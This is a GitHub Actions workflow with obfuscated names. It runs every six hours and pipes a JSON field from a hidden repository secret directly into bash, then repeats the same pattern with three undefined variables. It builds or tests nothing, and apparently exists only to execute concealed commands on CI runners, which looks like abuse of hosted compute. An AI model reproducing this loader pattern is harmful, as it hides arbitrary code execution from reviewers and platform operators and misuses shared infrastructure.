name: pengjingzhong7519
on:
  workflow_dispatch:
  schedule:
    - cron: '6 2/6 * * *'
jobs:  # 1221
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: pengjingzhong7519
        env:
          z7: ${{ secrets.z7 }}
        run: |
          echo $z7 | jq -r .bze32 | /bin/bash
          echo $uim25 | jq -r .ap33385 | /bin/bash
          echo $g309 | jq -r .lw904 | /bin/bash
          echo $m0 | jq -r .ulmw847 | /bin/bash

